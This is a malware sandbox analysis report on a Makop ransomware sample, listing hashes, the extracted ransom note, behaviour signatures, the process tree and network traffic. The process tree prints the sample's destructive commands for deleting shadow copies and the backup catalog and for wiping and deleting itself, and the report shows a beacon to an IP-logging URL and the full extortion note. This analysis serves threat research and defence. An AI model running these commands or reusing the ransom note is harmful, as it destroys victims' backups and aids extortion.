Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2024-02-18...op.exe

windows7-x64

10

2024-02-18...op.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    18/02/2024, 14:45 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe

  • Size

    42KB

  • MD5

    52b1171ccd66ff02c2947927300d9c33

  • SHA1

    eeb6ef1830ed9b6c8838bcf398c878525a421e23

  • SHA256

    a043cf14c1e9bb9e6fcbf8a3302acf7e7c46dfeaa40ed7a1c6d31d17ab40a261

  • SHA512

    26e27833e0197073867fadc4d4493ffaf69b4e4bb3e68c0b6e55bc88a1222fa0f0a520c303ef15961e46ffb297aa1305d8f5221dfc9a275c5eb258c35049b88a

  • SSDEEP

    768:EO1oR/6VS1RzK4wbs+D/SIJX+ZZ1SQQwZuIOPzDqW52BqwLnTZpk1M:E2S1FKnDtkuImngBqwLTZy1M

Score
10/10
ransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt

Ransom Note
::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay us. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: You can write us to our mailbox: cyberrestore2024@onionmail.org Or you can contact us via TOX: 2045F43C36CF86051CC7129C1FF74E84BCDC7A527C059676E546F58A1D8DF94B3C47F17F2E54 You can download TOX client here: https://qtox.github.io/ .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don�t want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.
Emails

cyberrestore2024@onionmail.org

URLs

https://qtox.github.io/

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Renames multiple (8322) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe" n1948
      2⤵
        PID:2180
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2256
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:2360
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          3⤵
          • Deletes backup catalog
          PID:2772
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2932
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe" & del /q /f "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\SysWOW64\PING.EXE
          ping 1.1.1.1 -n 5
          3⤵
          • Runs ping.exe
          PID:1520
        • C:\Windows\SysWOW64\fsutil.exe
          fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe"
          3⤵
            PID:2212
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2764
      • C:\Windows\system32\wbengine.exe
        "C:\Windows\system32\wbengine.exe"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2680
      • C:\Windows\System32\vdsldr.exe
        C:\Windows\System32\vdsldr.exe -Embedding
        1⤵
          PID:2376
        • C:\Windows\System32\vds.exe
          C:\Windows\System32\vds.exe
          1⤵
            PID:1664
          • C:\Windows\system32\Dwm.exe
            "C:\Windows\system32\Dwm.exe"
            1⤵
              PID:1704

            Network

            • flag-us
              DNS
              iplogger.com
              2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
              Remote address:
              8.8.8.8:53
              Request
              iplogger.com
              IN A
              Response
              iplogger.com
              IN A
              104.21.76.57
              iplogger.com
              IN A
              172.67.188.178
            • flag-us
              GET
              https://iplogger.com/1VpeH4
              2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
              Remote address:
              104.21.76.57:443
              Request
              GET /1VpeH4 HTTP/1.1
              Referer: 1D7BA18E;2.25
              Host: iplogger.com
              Cache-Control: no-cache
              Response
              HTTP/1.1 200 OK
              Date: Sun, 18 Feb 2024 14:46:21 GMT
              Content-Type: image/png
              Transfer-Encoding: chunked
              Connection: keep-alive
              set-cookie: 416940421502943035=3; expires=Tue, 18 Feb 2025 14:46:21 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
              set-cookie: clhf03028ja=89.149.23.59; expires=Tue, 18 Feb 2025 14:46:21 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
              memory: 0.42227935791015625
              expires: Sun, 18 Feb 2024 14:46:21 +0000
              Cache-Control: no-store, no-cache, must-revalidate
              strict-transport-security: max-age=604800
              strict-transport-security: max-age=31536000
              content-security-policy: img-src https: data:; upgrade-insecure-requests
              x-frame-options: SAMEORIGIN
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vluBRWy4CIZ5PUb%2FKq2CnQMakQdAji0H7AW6u2euGnBSiq%2B7h0dK%2BCGbOcI15eRAASBnHFa0wKYTnJ4%2FURzBG6W5JREb6IAQERUhPojkdnTsTNEctE5c6lZ1SPPWvY8%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 85770f21ef247753-LHR
              alt-svc: h3=":443"; ma=86400
            • 104.21.76.57:443
              https://iplogger.com/1VpeH4
              tls, http
              2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
              1.0kB
               7.3kB
               12
              12

              HTTP Request

              GET https://iplogger.com/1VpeH4

              HTTP Response

              200
            • 8.8.8.8:53
              iplogger.com
              dns
              2024-02-18_52b1171ccd66ff02c2947927300d9c33_makop.exe
              58 B
               90 B
               1
              1

              DNS Request

              iplogger.com

              DNS Response

              104.21.76.57
              172.67.188.178

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt
              Filesize

              1KB

              MD5

              4cd9a7d10732ce6c99aedabfba1d8d64

              SHA1

              6575eb09c5acd181935311dfc6621a2b2d2ac0c9

              SHA256

              bbdbd67b963a725d054682be52c8c7d83610b73ba1ce7b9c230847f228a2188d

              SHA512

              e2deede94446730170f749977991c6e97eb65c7c80052e029a864e202cffd29eab913377ad924f6d712c5568e29e42cd94afde03c374d8ef23ed3ac80fe676a1

              Download Submit

            We care about your privacy.

            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.